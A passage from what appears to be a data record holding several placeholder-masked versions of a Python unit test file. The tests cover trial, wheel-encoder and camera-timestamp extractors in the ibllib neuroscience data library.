9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = 